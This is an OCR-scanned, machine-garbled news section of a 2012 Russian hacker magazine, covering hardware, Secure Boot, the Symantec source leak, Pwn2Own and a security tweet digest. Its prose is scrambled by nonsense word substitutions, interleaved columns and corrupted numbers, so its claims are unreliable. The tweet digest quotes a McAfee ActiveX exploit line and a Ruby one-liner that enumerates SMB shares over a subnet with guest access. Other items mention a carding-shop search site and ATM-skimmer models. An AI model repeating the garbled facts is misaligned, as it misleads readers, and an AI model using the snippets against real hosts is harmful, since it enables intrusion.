Мо д дерево 027 В 070 выпо л нена во соли д ном да одновре­ менно не без; во ерхтонком корпусе, а всегда основы управления

помещены на эргономичную алюминиевую подставку !там же нахо д ятся брюки ввода - вывода да U 0 В -концентраторl , регулируемую за высоте. Д иапазон регулирования монитора 0-й серии за высо т е составляет

00 см,

сильная сторона его

позволительно н а клонять. П а н ел ь имеет ультравысокую разборчивость

QHD 02560 х 04401, поддерживаеттехнологии Display P oгt, Dual L iпk - DVI да Н DMI, а равным образом оснащена стереодинамика ­ ми мощностью 0 Вт да интерфейсом MoЬile High Defiпition Link IM HLI д ля п одключения смартфонов да планшетных П К. Устройство п об дд ерживает эксклюзивную технологию

0amsung

Nat uг al Соlог Е х р ег t , ко на озмож н восход ваш покорный слуга м которой

относитс автор этих строк аппаратная ка л ибровка цветов. 027 В 070

а <<эффект мокрой шмотье >> !, каковой нередко проявляе т ся

ловок воссоздавать паче миллиарда оттенков, ась?

дажеутоповых современных дисплеев. Так в духе <<кристал­

гарантирует долговязый реализм равно печать подле отображе­

лический эффект>> напрямую обусловлен матовостью па­

нии фотографий равно ви д еороликов, сделанных от через

нели, у глянцевых мониторов спирт положительно отсутствует.

числовой фо т о- или — или видеокамеры. Кстати, пресс-релиз

Здесь игра стоит свеч заметить, что-то равным образом первые образцы получай базе

обещае т, что-то инже н еры 0amsuпg вруч н ую будут на­

вызвали немалое веселье утех, чтобы кого загодя всего делов

страи на ать ц ветопере д ачу ко аждого монитора серии

0

PL5

Яр кость: 000 кд/м 0 Равномерность )мин .): 00% К возлюбленный т растность (статичес ко ая) :

0000:1 Время отклика

(GTG): 0 м с Угол обзора (гор/верт.) : 078°/1 08°

во целых н насчёт удобства н ое с целью зыркалки изображение, целое в области праздник а

получи окончательном этапе сборки. Кроме в таком случае г об , весь регистан

причине : РL5 - дисплеи от матовым экраном прагматично

дисплея да снабжена антибликовым стеклянным 011

неграмотный проявляли <<кристаллическо г по отношению эффекта>>.

покрытием. Да-да, от т арое доброе стекольце от антибликом,

Р а зрешение : 0560х 0440 Глуб ан а цвета : 0,07 млн цветов

Ожидается, сколько новинка поступит во продажууже на мар­

давненько ты да я такого неграмотный видели. Этот свежий различие

те текущего годы lк сожалению, неизвестно, появится ли

полагается особенно обра д в рассуждении во атыех, чьи зеницы чувствитель­

возлюбленная вдобавок да на России!. Ориентировочная тариф 027В970

ны для беспричинно н я ы ваемому <<к ри ста л ли ч ескому эффекту>> !он

состави т $1199.

ЭТА МУЗЫКА БУДЕТ ВЕЧНОЙ. ПАТЕНТНЫЕ ВОЙНЫ ПРОДОЛЖАЮТСЯ

APPLEOБBИHЯETSAMSUNG ELECTRONICS В ТОМ, ЧТО ЧЕХЛЫ ДЛЯ ПЛАНШЕТАGАLАХУТАВ 00.1

И СМАРТФОНОВ (!) НАРУШАЮТ ЕЕ ПАТЕНТЫ

010

ХАКЕР

03/158/ 0012


PhoneAndroid: Почти закончил из

linux.js. Да,

сие

моя JаvаSсгiрt-реализация ядра

Linux.

[]

Почему ваша милость для меня в такой мере

Яндекс, сnециалист по части безопас­

Chгoot-ing во

ности веб-приложений: спе­

легко, наравне да А : , Б:, В : ...

циалист по мнению безопасности веб­

http://Ьit . lv/yQQq_ml:J .

Windows- этак

а

приложений на компанию Яндекс ...

Ь.it.lvд'ol.,m_!?.<J .

Комментарий:

Да, во винде как и позволительно <<чрутить>> ...

lilcBekrar: Взлом Chгome вместе с

ASLR + О ЕР­

обходом + живительный сnлойт с целью

Комментарий: Конкурс Яндекса

El

сообразно взлому сервисов прошел удачно;] . lil_sinnЗr:

обхода nесочницы за сов? Мы живем во разных мирах .

El

0О ко бак­ #pwn2own

А гляди да РоС пользу кого

lilcBekrar:

Комментарий: Фронтмен компании

Vupen

Большой #fаil-приз отправляется

возму­

для

щается призовым фондом предстоящего

конкурса

PWN20WN.

McAfee SaaS 0-day IZDI-12-012]: obj.ShowRepoгt "calc.exe" .

Защитные механи1мы

становятся всегда сложнее, равно к их обхода требуется чище сил равным образом вложений ...

McAfee

Secuгity-as-a-Service,

каковой устанавливает позор­

ный

ActiveX,

I:Jjt.jyд_bj..t_gf

Комментарий:

Вот да полный эксплойт- obj.ShowRepoгt

позволяющий совершать адрес

"calc.exe".

via rathezdi.

пания устанавливает «бэкдорь~» клиентам.

Да ... видишь эдак антивирусная ком­

А покамест забавно, зачем эа такую

тила во районе

lilmartincronje:

lilmeder: Написал во блог относительно моем послед­

Водан однова равно на всех :

нем баге:

CSS

другими словами JаvаSсгiрt-библиотек

подобно

jQuery.

CVE-2011-3923.

Еще

одно удаленное проведение

стих во Stгuts2: Ьlt.R:fiЬ.i.!JYLY.E.iЬ.ы.

El

0-day ZDI запла­ 1-2 для баксов . :] Вот эдак ...

El

Комментарий:

HTML5 !=

Комментарий:

Исходникам неграмотный доверяй никогда, Люк! Дебаггером воспользуйся вначале равно убедись во потоке

Кэп ...

Сегодня у нас полноте бог не обидел ссылок­

общеобразовательный выхлоп т витов, так сказать. Те, кто такой думает, что-нибудь возьми

Java

lilmikesica:

дозволительно

Любой благой конструктор лени­

кадить, никак не оnасаясь RСЕ-багов !ну в духе же,

вый, тем никак не менее, невыгодный первый попавшийся

Java- сие ж секурно], вообразите уже раэ! Ведь накадить не возбраняется всякое ...

неподвижный конструктор хороший.

Если бы РНР был британским:

peгchance ifcondition] { // Code hеге}

otherwise { // Code hеге }.

liljcran: Написал свежеиспеченный блог-пост: сканирование

багов на виртуальной машине с через «Докаэателя тео­

рем» - bl.lgД.pjt . [y/~J.gZ~К.

El

Комментарий:

Не фаззингам единым ... те, кто именно инте­

ресуется методами поиска уяэвимостей,

Ручной-- iгЬ> l1 .. 054].each {lxl puts "host- 00.0 . 0 . #{х}"; 'smbclient -L 00.0.0.#{х} -Uguest -N' }.

El

Комментарий:

RuЬу-скрипт про скана «шар» не без; учет­

который гостя ...

обратите забота сверху это.

lilstephenfewer: Открыл порцию исходников моей системы фаззинга в целях браузеров

Не знал касательно BinScope: hllQJLI:Ij_tJYLyzcQYR . Полезна

с целью

обнаружения бинарников помимо

NX, SafeSEH, /dynamicbase, равно т . д.

'Fгindeг'- http:UЬit.lyLx.rUJJiW.

ХАКЕР

03/158/2012

.,,


В СЕТИ В ВИДЕ ТЕКСТОВОГО ФАЙЛА оказалисьданные насчёт шести миллионах nоль з ователей крупнейшей на КНР комnании­ разработчика сетевого ПО (CSDNI.

MEGANEWS

МИНИСТР СВЯЗИ ПОСЕТИЛ

СОБРАНИЕ ПИРАТСКОЙ ПАРТ ИИ ПАРАДОКСАЛЬНО, НО ЭТО СОБЫТИЕ ИМЕЛО МЕСТО В РОССИИ

В хо д е бесе д ы со насчёт Щ е ­

BSOD

В

WINDOWS 0

ЛЕГКИМ ДВИЖЕНИЕМ РУКИ НАЙДЕНА КРИТИЧЕСКАЯ ДЫРКА В ссСЕМЕРКЕн

голевым выясни­ л ось, ч ведь во це ло м насчёт н

п об ддержи на аети д е ю о ткрыты х д анн ы х , н что до д ек покровитель ац ию по части т­ к рытого госуд а рства как-т касательно « безвыгодный насчёт цени л •>.

Кстати, официал ь ­

да

нф об р ма ция что касается н по части хныканье н е ради для рытой для ритиче из ко что до й у пишущий эти строки з вим ос т равно на Wind ow s 0 х6 0 вп е рвы е появила не без; ь в Т витт е р е изв нашел тн по части г об ха кера

w3bd3vi l. Б а г был wi n32k.sys [ н ео д хотя кр а т н ы й вин по части вни ко кри т ич йес ки х ошиб в отношении ко на Win XPI.

относительно бнар у ж е н на ф а йле операционной систем ы

ных коммента р ие на

ко т насчёт ры й от насчёт д е р жи т ради на ис ящ у ю что касается т ядра ча вместе с ть п касательно льз об ва­

п что до поводупри­

т е л ьско г касательно ан т е р ф е йс а равным образом касательно тн ос ящ уюс аз многогрешный для нем у инфрастр у к­

сутствия главы Ми н­ комсвязи нате встреч е

ту р у. Зам е тим, чт относительно 02 - би тн а автор во е р из ия ОС невыгодный закачаешься не без; nриимчива

членов Пиратск что касается й

для ош ибке, во ведь вр е мя для ак 0 0- б итная << Семерка » может

партиитак да далеко не по­

н е толь ко у й т да равно з-з а малограмотный е на

следова л об .

BSOD,

только равно nозволяе т ввести

на ма ш равным образом н у вр е д относительно н ос ный для по отношению д держи у р ов малограмотный ядра. Однако самый ин т е р йес ны й нюан из з а ко лючается во др у гом: пр в рассуждении тотип заключение , демонс т риру ющ е го , как бы ваш брат з ы ва т ь установленный вместе с ибо й, уж у тек в С е ть . О ко а з а лос ь , ч так сие пр ос т ой НТМ L- скрипт. Е г об з а­ п уск во б ра узе р е

Sa fari б ы от тр что касается пр иведет ко ошиб ке от тра н и­

ц ы в н е спр е д е л е н получай м у ча от т для е nамяти, да авто n в рассуждении кажет

•с да н ий э стриппер из м е рти ». Этотскриn т представля е тсоб касательно й все г что до всего только т е г

iframe не без; чр ез выч ай н в рассуждении б касательно льшим атриб у волюм

высо т ы. Уя зви м ос т равно т насчёт чн в рассуждении п по части дв е р а получай 04-битная издание

для

а ко не тайна , на России П ира т екая ассоциация даж е далеко не зарегистрирована [нет,

Windows 0, относительно дн ако,

ребята пытались , да ни ложки малограмотный вам ш ло) . Тем малограмотный м е нее, способности т ия точный

ском п р относительно ме стенд насчёт на ин ы да др у г ие не без; равно со темы. Патчана этот

nроводитсобрания,одноизкоторыхсостоялосьв вместе с ерединея н варвара

момен т н е су щ е ств американский рубль т .

в качестве кого с м е ч аю т э ко от перты , м по отношению г у т состоять

на книж н ом магазине << Ц иолко на скиЙ>>, к~то ры й наход ится во зда н ии П олитехниче ­ ского музея . Д ля всех пришедших получи и распишись совмест н ый получение П иратской n артии, Ф спирт д а развития электронной демократии равно рабочей группы << ИГ апелляция н ых действий>> стало полной неожиданностью приход на магазине Игоря Щ еголе на а , ми н да ­

стра маза равным образом массовых коммуникаций РФ. П редсе д атель партии П а на ел Р ассуд что касается в nишет на своем ЖЖ : << М инистр ес вид. что будт что касается зашел во на ы хо дн ой купит ь п ару ко ниг равно нуль малограмотный знал что до н амечен н касательно м собрании. П рисутст на ую суп е н а во стре ч е п ро г раммеры от р азу нак ан ул ись получай Щ е г репатриант на а. Ещ е быl Н е каж д ый д е н ь yes т ь возможность заявить на се что такое? думаешь во харя министру связи. Ау n р в отношении гр ам ми­

стов было что-то ему сказать.

:1 Н что касается министрдержался молодцом, говорил ск л а дн о,

одначе малограмотный сказал ничто конкретного. Сразу что ль - великоватый опы т работ ы в аппарате >> . Щеголев ответил получай цепь вопросов, после д анных учас т никами собра ­ ния. В частности, рассказа л , который вслед за го д -по л пятикнижие во Р оссии може т б ыть вв е д е н а

строй электронного голосова н ия, всё же общество, объединение ми н равным образом ю минис т ра, пока безграмотный испытывает nотребнос т равным образом во такого типа системе. П одробности на ЖЖ П авла

Рассудова:

webpo lit.livejournal.com/72397.htm l.

NGIИX сс ВИНЧЕСТЕРНЫЙ» ГИГАНТ

NGINX ВЫШЕЛ НА ВТОРОЕ

ТН Е Pl RATE ВАУ &ОЛЬ-

-компания

МЕСТО за числу обслужи-

ШЕ НЕ &УДЕТ ХРАНИТЬ

TORRENTFREAKCOO&ЩАЕТ, чт насчёт Cr ysis 0 стала

приобрелаподразделение

ваемых активных сайтов,

ТОRRЕNТ-ФАЙЛЫ равным образом nолно-

не без; амо й скач да ваемойчерез

nомощью шелковица но обвинил

комnании

обогнав

стью п е р е й -де т нате magnet-

BitТo r rent игрой интересах РС

ссы л ки. Теn ерь magnet-U RL

во 00 01 г оду. С л едо м равным образом дутСаll of Du ty: Modern Warfa r e 0 и Battlefield 0.

Google во nоддержке nиратства . В Google сnоко й так доставать

Seagate-

Samsung сообразно ошибаться

изводству жестких дисков.

Суммасделкисоставила

$1,375 млрд.

012

Microsoft 015. По данным комnании NetCraft, на первом месте nока Apache (57,93 %).

предлаг аю т из пишущий эти строки дл пишущий эти строки загруз ки по умолчани ю .

МЕДИАМАГНАТРУПЕРТ

МЕРДОК завел Twitter равно из его

звалиобвинение чушью .

ХАКЕР

03 /158/ 0012


GOOGLE НА ТРИ ГОДА ПРОДЛИЛАСОГЛАШЕНИЕ С MOZILLA об исnольз овании своего nоисковика во качестве основногодля Fiгefox .

БОЛЬШЕ КОЛОНОК, ХОРОШИХ

MICROSOFT, КОНКУРЕНТЫ

И РАЗНЫХ

ИАRМ-СИСТЕМЫ

СРЕДНИЙ ЦЕНОВОЙ СЕГМЕНТ И НЕИЗМЕННО ВЫСОКОЕ КАЧЕСТВО.

О НЕ ВСЕГДА ЧЕСТНОЙ БОРЬБЕ ЗА МЕСТО ПОД

КОНЕЧНО, ЭТО

СОЛНЦЕМ

EDIFIER

Е

ще на конце прошлого лета шатия-братия

Microsoft

сделала заявление, которое породило у многих

нехорошие подозрения . Напомним, в рассуждении нежели согласен спич .

В конце 0011-го шарага

Microsoft впервой озвучила , что Windows8 будеттребовать Secuгe Ьооtдля загрузки [то есть обязательной активации режима безопасной загрузки

UEFII. Эта функционирование произведение е ттак : UEFI сохраняет«секретные ключи >> во ОС. Все, ась? хочетзагрузиться возьми компьютер, для при­ меру операционная система, равным образом от польз американский рубль тэти ключи в целях до­

из туп а для

UEFI. Е сли на ОС далеко не прописан уместный контролька ,

возлюбленная никак не получит отчётливость для загрузку. Liпu х-сооб ще со тво уже в этом случае попыталосьдонести предварительно пр оиз водителей , зачем

исполнить передач у ключей в из-за что-что определить

Linu x короче весть сложно, Linu x бери заточенные подина Windows8

устройствастанетпрактически невозможно.

Однако

Microsoft корректно пояснила , что-нибудь невыгодный имеет Linu x равно дру ги х что касается ткрыты х ОС , равно сражается

ни аза сравнительно вместе с чем

ни крошки неграмотный не без; ко нк у р е нтами , а не без; вредоносными кодами. Мол , безопасная погрузка тем равно х ороша для того работы

для

итайская пароходство Edi fieг представила во э том месяце за единый вздох двум новых модели. Об е новинки по­

полнили топовую линей ку систем

0.0. П ервое ауд ио-ре ш е ние- колонки R1500TM

из пр о­

фессиональным микрофонным входом, кто имеет независимый контроллер громкости . Новинка может похва­

случаться тради ц ионным про

Edifier деревянным

кор пусом

[что гарантирует в рассуждении т сутствие резонансов!, НЧ-дина миками

napa

интересных

фактов : получи и распишись заводах

компании Edifier производится более 12 млн комплектов мультимедийных к в рассуждении лонок во бадняк . За­ воды расположены на трех континен­

тах. Научно­ исследовательским

не без; магнитным экра н иро на а нием равно 08-мм шел ковыми ку­

центром компании

полообразными твитерами . Стереосигнал, подаваемый

руководит хорошо

в входные разъемы

RCA,

обраба тывает ся схемой дина­

мическо г касательно повышения высоких частот, которая спе циаль­

прославленный конструктор

вредоно сных программ. Надо признать, выглядит по сию пору это действительно логично. Но пока что

Microsoft подготовила плавдок уме нте требова­

ниями, которые никуда не денешься выполнитьдля сертификации компьютеров получай со вместимо ст ь со Windows 0. Бумага , увы,

подтвержд ает худшие опасения. Здесьлучше итого про­ цитировать.

Официальн ое руко водстводляпроизводителей,желаю­ щи х половая принадлежность вразумлять сер тификацию Windows 0для своих усик тро йств,

равно конструктор Фил

вместе с траница

Джонс .

мо претворить в жизнь способ отключения

а разработана интересах мультиме диа.

Windows, аюшки?

такойпроцессперекрываетещеодинканалпроникновения

016: « В системах, безграмотный относящихся кАRМ, необходи­ Secure Boot сквозь

интерфейсустановки прошивки . Физически присутствую­

Вторая новика-двухполосные колонки R900Т. Эта акустическая 0 . 0-система, оснащенная 0-дюймовыми НЧ-динамиками да 03-мм шелковыми куполообразными

щий пользовательд что касается лж е н владеть мочь отключить

Secure Boot путем интерфейс установки, малограмотный владея Pkpri v. Программное обесточивание Secure Boot средствами UEFI

т ви терами, здорово воспроизводитгл убок ий, денежный

безвыгодный надлежит взяться к тому идет ни вот пора следовать грузки , ни в области ее

басок равным образом зво нки е высокие частоты. Габариты

насчёт кончании>>.

скромны:

040 х 026 х 097 мм.

R900T смертельно

Колонки подумаешь отсоединить

П олучается, просьба

Microsoft от м, сколько возлюбленная небу­

для выбранн ым источникам сигнала посредством 0,5-мм со тер еовхо д

деттребоватьотnроизводителей «ж елеза•запретить

RCA иначе RCA держи RCA,

размыкание

ко торые не без; п особ ны провести равным образом уси прыскать

Secure Boot, получи и распишись деле распространялось всего

сигнал, попадающий со любого источника звука, да обес пе­

держи традиционные ПК , н касательно отнюдь не получи АRМ-устройства. Пр оизво­

читьвысокоекачество звучания.

дит е ли систем, базирующихся бери ар х итектуре ARM , теперь не по лжны уступать никаких способов отключения безопасной загрузки. Именно текущий время - обязательная

ПОВСЕМЕСТНАЯАВТОМАТИЗАЦИЯ

безопасная погрузка -ставит Linu x [и невыгодный только! во затруд­ нительное положение. Фактически сие озна чает, чтотеперь для «за гружаемости >> в одной изо таких машин , сертифици­ рованных возьми сочетаемость не без; Windows

ПО АДРЕСУ MEGASEARCH.CC ЗАРАБОТАЛ АГРЕ ГАТОР КАРДЕРСКИХ МАГАЗИНОВ, ТО ЕСТЬ РЕСУРС ДЛЯ ПОИСКА ВОРОВАННЬIХ БАНКОВСКИХ КАРТ ХАКЕР

03/158/ 00 02

0, уместный

ди от трибутив Linuхдолжен совмещать се ртифицированные крип­ таключи с конкретного равно з г отови т ел пишущий эти строки компьютера. Вста е т ре з онный вопрос: идеже их взять? Е сли выдачей ключей будут за ниматься производители , так разработчикам ди стрибу ­ тивов придется по одному контактировать от каждым с ни х.

Иеслиогромная ко рпорацияможет се бетакоепозволит~ толин укс оидам сие врядли окажется подина силу. Централи­ зова нного касательно ргана сер тификации , кто бы формировал к лючи в целях режима безопасной загрузки

UEFI, безграмотный существует. Microsoft пытается биться далеко н е исключительно не без; малварью, однако равно вместе с устано на для ой Linu x, Android да др у­ Словом, согласно хоже,

ги х открытых ОС бери АRМ-системы.

013


MEGANEWS

КАРСТЕН НОЛ ИЭSECURIТY RESEARCH LАВS ес очереднуюуязвимость на GSM . Подробности спирт непостоянно безвыгодный разглашает. ·

СКАЧАЙ И РАСПЕЧАТАЙ!

PWN20WN

ПИРАТИТЬ ЧЕРЕЗ СЕТЬ МОЖНО НЕ ТОЛЬКО ИНФОРМАЦИЮ,

ПРАВИЛА

МЕНЯЕТ

НО И ВПОЛНЕ РЕАЛЬНЫЕ ОБЪЕКТЫ

ПОПУЛЯРНЫЙ КОНКУРС В ЭТОМ ГОДУПРОЙДЕТ В НОВОМ ФОРМАТЕ

м

ы ранее безвыгодный ра з рас­

сказывали тебе о замечательномха­

кереком конкурсе

Pwn20wn,

учас тни кико т ороголомают

самый разношерстный софт равным образом желе­ зо, а nотом уносят со на вывеску

хакнутыетрофеи [железные, конечно же) во качестве возле ­ зов. Сообщаем, сколько во этом году взгляды на вещи соревнования

изменились. Теперь на конкур­ се участвуюттолько

з

Microsoft Apple Safaгi, Google Chrome равным образом Mozilla lnteгnet Exploгer,

0-принтеры неторопливо , хотя не исключено про­ бираются в иждивенческий торг .

Уже неотложно таковой девайс [к примеру,

японскую

Firef oxдля операционных си­

iModela) мож только возле обзавестись после пару

стем

вариант, а безграмотный надо бы хуже технический беннер не­

вообразимых размеров. С каждым денно об этих трехмерных чудесах прогресса появляется всегда

в большинстве случаев статей, постов, дискуссий. А крат интерес и испытание растут, появляется равным образом предписание .

Ещ е пр относительно шлой по осени получи т орре нт-тр екере

The Pirate Ва уоткр ыл ся

раздел вместе с пр ограммами

с целью 00-принтеров, же какая-то активность наметиласьтамтолькосейчас.Д об рыелюди

Windows 0 равно

Мае

05 Lion

[последние версии со все-

тысяч долларов, да э т в отношении короче не аюшки? иное «домашний»

ми патчами). Мобильные

Одним изо преимущественно

девайсына конкурсе свыше

известны х про·

открывать отнюдь не будут.

ектов за ЗD·печати является

RepRap

Главным сnонсором объявле-

-открытый прое для т

сверху шарага

по части созданию принте­

Hewlett- Packard. 30

р что касается во , способных

Три соответственно бедителя получат денежныепризыв размере 00тысяч,

восстанавливать в памяти

тысяч равно 05тысяч долларов плюстрофеи на виде н аутбуков вместе с пирушка самой

себя. Новейшая

системой , которую им удастся взломать.

фасон называется

Mendel, да составить

Компания

Google в свою очередь учреди ла дополнительные призы 20 тысяч долла­

наконец-то начали обмениваться равно как схема ми,

ее станет любой желающий (это

где-то равно реальными объектами. Уже не долго думая на этом

подлинно не·

ровенник ради исnолнение sandbox-кoдa от исnользованием одной токмо

разделе допускается от кача ть пластма ссово го робота

сложно!. Стоимость

уязвимости на

следовать хакинг браузера Chгome. Она обе щает дать взятку

всех компонентов

Chrome.

В

0О тысяч долларов оценивается

ис п олне н ие

изо вселенной Warhammeг 00К либо — либо хот-род­

составляет общем

sandbox-кoдa от исnользованием уязвимастей на правах во Chгome, приблизительно да на

мо д е ль ш евроле

$520.

операционной системе.

0970 возраст .

Н в отношении сие безобидные

игру ш ки, а чай на Сети поуже некоторое эпоха цир­

Но самое главное, ась? во этом году изменятся самочки идеология

кулируютслухи от м, ась? получи и распишись черном рынкетор­

Pwn20wn . Взломанная построение теnерь невыгодный неосуществимо

гуюти30-моделямискиммеровдлябанкоматов.

зания, в качестве кого до тех пор . Все другие участники имеют допустимость

изо состя­

Есть даж е n одтверж д е ния тому, что такое? моше нни ки

во направление трех конкурсных дней вскрывать ее своими методами.

действительнопольэуютсятакимимоделями!

Соответственно, эффект соревнования нынче подсчитывается

Н е т, во « Б ухте» они в эту пору неграмотный на сплывали, однако сие

no очкам.

неприкрыто воnрос времени . По хоже, у правоохрани­

В этом году

тельных органов соответственно всему миру быстро появится

курсе дозволено фигурировать равным образом во удаленном режиме!

Pwn20wn

nройдете

0 за 0 марта.

Не забывай, зачем на кон ­

сызнова в отношении дна головная одонтагра .

КОМПАНИЯSОNУПРЕД­

СТАВИЛА КАРТЬI ПАМЯТИ

SONY

собственного формата

XQD.

Ориентированы они как на профессиональных фото­ графов, приближенно равно держи энтузиастов.

В режимах чтения\эаписи

H

Seri senees

02 GB

пропускная гений

достигает

0 Гбит/с (125

XQD

Мб/с) .

ДВАДЦАТЬВОСЬМОГО

КОМПАНИЯ TIOBE SOFTWARE

Продажи сделано начались. Карта

ЯНВАРЯ СТАРТОВАЛ ВТОРОЙ

УДОСТОИЛАОВJЕСТIVЕ-С

QD-H16 объемом 06 Г б стоит $130, QD-H32 нате 02 Г б- $230,

FACEBOOK HACKERCUP,

ЗВАНИЯ «ЯЭЬIК ГОДА».

каковой проводится еже­

Однако для первом месте

Также представлены равно устрой­

годно . Лучших ждет поход

соответственно популярнотипо-прежнему

ства для того работы от новым

на штаб-квартиру Facebook,

есть расчет Java, а ради ней идут С,

а победительполучитпять

С# равно С++.

форматом.

тысяч долларов.

ХАКЕР

03/158/2012


• •

~ WI!XLI!Г.

www.wexler.ru

Электронная сборник из доступом на Интернет

У SYMANTEC УКРАЛ И ИСХОДНЫЕ КОДЫ АНТИВИРУСА

Читай. Смотри. Слушай.

ХАКЕРЫДИСКРЕДИТИРОВАЛИПОПУЛЯРНОГО ВЕНДОРА

оддавлением хакеров бражка Symaпtec, являющаяся одним с самых известных во мире поставщиков решений

во сфере информационной безопасности, была вынуждена признать, что такое? хаке рам посчастливилось получитьдоступ для исходному коду це ­

лого ряда ее прод уктов. По словам представителей Symaпtec, на ходе расследования было установлено, в чем дело? выкрадывание исходного заключение анти­

вирусов произошла сызнова на

0006 году.

После сего шатия-братия ввела фаланга

мер для того усиления безопасности, в надежде невыгодный пустить повторения по­ добных инцидентов на будущем. Хакерам посчастливилось свистнуть исходные коды таких продуктов, на правах Nогtоп Aпtiviгus Согрогаtе Editi oп, Nогtоп l nteгпet Secuгity, Nогtоп SystemWoгks равным образом pcAnywheгe версий

02.0, 12.5. Об утечке итак кого хошь спроси на середине прошлого месяца, когда незнакомый хаккер Yama Tough, причисляющий себя да ко «Ано нимам», и для хакерекой группировке Lo гd of Dhaгmaгaja, написал на Твиттере, что располагает исходниками Noгton Utilities. В резон он 12.1

да

выложил ссылки бери мелкотравчатый бумага со описанием программно­ го интерфейса сервиса в целях создания об писаний образцов вирусов,

а по времени да от писок файлов, содержащихся на архиве не без; исходным кодом Nогtоп Antiviгus. Опубликованный судоремонтный завод у мент, кстати, датируется апрелем

0999 года.

Конечно же,

Symantec моментально сообщила,

аюшки?

данные с сего документа неграмотный может подгадить нынешним продуктам компании. Зато картотека со скончание ным кодом товарищество невыгодный про­ комментировала.

П в рассуждении заявлениям самих хакеров, информа цию им посчастливилось выудить

из серверов ведомства военной разведки Индии. Иными словами,

у эструс произошла невыгодный с сетей самой Symaпtec [хоть сие радует). По некоторым данным, хактивисты опубликовали имеющуюся у них информацию, с целью помочь судебному разбирательству, которое

новобрачный началось на США. Д есятого января сравнительно от чем Symaпtec было выдвинуто контробвинение во том, ась? возлюбленная продвигаетсвою продукцию с через где-то называемых sсагеwаге-программ, которые запугива­

надстройка пользователей, извещая их в рассуждении возможных проблемах из безопасно­ ст ью на особенно назойливой форме. Несмотря получи и распишись всё-таки заявления Symaпtec, в чем дело? у хакеров оказались старые данные, которые неграмотный могут намыть никакого вреда, раз­

работчики поуже начали отпускать патчи. Компания предп очитает перестраховаться , сверх зависимости оттого, чей не кто иной «утекла»

катамнез равно до чего возлюбленная актуальна держи отваленный момент.

WEXLER.BOOK

МЫ ЛЕГИОН: ИСТОРИЯХАКТИВИСТОВ

ПРОФЕССИОНАЛЬНЫЕ ДОКУМЕНТАЛИСТЫ ИЗ КИНОКОМПАНИИ LUMINANT MEDIA СНЯЛИ

03-МИНУТНЫЙ ФИЛЬМ

О ВЕЛИКИХ И УЖАСНЫХ

ANONYMOUS ХАКЕР

Т7006

WI!XLI!Г. STORE

Удобный достуn для бесnлатным книгам и nоnулярные новинки.

Скачивайте да читайте сверху

www.wexler.ru!

:х:

что до

«МЕТРО 0033» ДМИТРИЯ ГЛУХОВСКОГО И ЕЩ~

<t

ДВА РОМАНА КУЛЬТОВОЙ СЕРИИ БЕСПЛАТНО

Cl.. с:[

по отношению

В ЭТОЙ ЭЛЕКТРОННОЙ КНИГЕ WEXLER

r::

03/158/2012 ТЕЛЕФОН ГОРЯЧЕЙ ЛИНИИ : 0 (800) 000 06 00


IEADER

КОЛОНКАСТЁПЫИЛЬИНА

ОХРАНЕНИИ ПАРОЛЕЙ ВЫБОР РЕШЕНИЯ

другими словами извращаться не без; его синхронизацией вследствие

активировать на аккаунте

Использовать единственный равным образом оный а шаг дело на всех

оный а самый Dг орЬох . Дост уп ко хранилищу

вые шаг роли, так зайти помимо такого токе для бросьте

сервисов сразу- одна изо самых серьезных

защищен мастер-ключом [сложным паролем),

еще невозможно. Каждый однажды полноте необхо­

ошибок пользователей. Но да подавить на голове

кто на целях безопасности до черта

партия насчёт засадить флешку, швырнуть

огромное цифра уникальных пассов­

восстановить. Будь осторожен!:)

истощить сгенерированный программой

НЕКОТОРЫЕ ФИШКИ LASTPASS Я далеко не буду выболтать по части том, что использо­

Только на этом случае позволено короче распатронить вплоть до

теорема откровенно непосильная. Я век пытался

одноразо­

Sesame

да

параль вообще со своим мастер-ключом.

приучить себя ко использованию менеджеров

батман ролей видать

LastPass

KeyPass [keepass.info), так

изо сего что-то около ничто равным образом невыгодный вышло. Открывать

вать

программу, с намерением выискивать в дальнейшем ни туды и ни сюды параль

могу безвыгодный поверить вместе с тобой несколькими по­

-явно неграмотный самое удобное, почто дозволено приду­

лезными фишками, которые меня порадовали .

LastPass,- со временем

безвыездно элементарно. Но далеко не

мать. Да да локальное хранилище, на котором

хранилища. По отдельности что-то мастер-ключ, что флешка из

Sesame

сокровище к злоумыш­

ленника ранее невыгодный представляют.

Двухфакторнан активизация посредством

Google

находятся зашифрованные движение роли, попахивает

Проверка надежности танцевальный шаг ролей

Для авторизации твоя милость и можешь нарыть

архаизмом- безвыгодный воровать но его сверху флешке?

Вотан всего только ясный путь того , почто танцевальный шаг роли хранятся

реальный токен-например YuЬikey вслед

Короче говоря, ваш покорнейший слуга решил испробовать решения,

во надежном хранилище, неграмотный делает их по­

[ stoгe.yuЬico.com ),- а можешь воспользовать­

которые круглым счетом же, как бы равно

настоящему безопасными.

ся сейчас готовым решением через

KeyPass,

:)

помогали бы

LastPass

от твоего

Google.

$25

Напомню ,

рождать уникальные шаг роли равно беречь

разрешения может предпринять резвый разложение

что-то учение с поискового гиганта предлагает

их, хотя кроме всего прочего механически использо-

пассов, подумаешь отыскав внутри них простые равно от­

установку насмартфон специального прило­

сыпь отсюда бы их на браузере! Вариантов здесь безграмотный приближенно

кровенно слабые [вроде

жения

много. Среди специализированных решений

му встроен бенчмарк, что высчитывает

«123456») . В програм­

[Google Authenticatoг), которая на кажинный

пора времени генерирует необыкновенный одно­

больше всего раскрученной оказалась пакет

бонитет надежности всех паролей,- ре­

единовременный ключ. Так на правах пишущий эти строки неусыпно пользуюсь

0Passwoгd [ agileЬits.com/onepasswoгd ), кото­

зультат дозволено найти сходство не без; показателями других

этой системой про входа на

раиса изначально появилась для того Мае, так потом

пользователей на специальном рейтинге.

настроил ее равно с целью защиты

Одноразовые парали

са йте 0helpdesk.lastpass . com/secuгity-options/

goog 0е -а ut hе nti саtог).

была портирована равно про

Windows.

Продукт

весть качественный, только передавать $69.99 ради

Gmail, в таком случае автор тутовник же LastPass . Подроб­

ную инструкцию позволительно обнаружить получай официальном

кроссплатформенную версию ми показалось

Многих, быть может , смутит выполнимость до­

слишком. Тем сильнее сегодня, в некоторых случаях практиче­

святилище для жете ролям из через одного токмо

ски интересах общей сложности дозволительно отыскать бесплатную альтер­

мастер-ключа . Нет проблем! На флешку дозволено

одноразовые парали равным образом двухфакторная автори­

нативу. Та ко вая, на общем-то, всерьёз

сделать в долг специальную утилиту LastPass Sesame [есть версии около любые ОС), которая,

зация доступны только лишь платным подписчикам .

бегло нашлась-ейстал видный

стервис

за сути, превращает диск на токе н. Если

надежное укрытие батман ролей.

LastPass [lastpass.com), сверху котором ваш покорнейший слуга равно

Справедливости из-за достаточно отметить, ась?

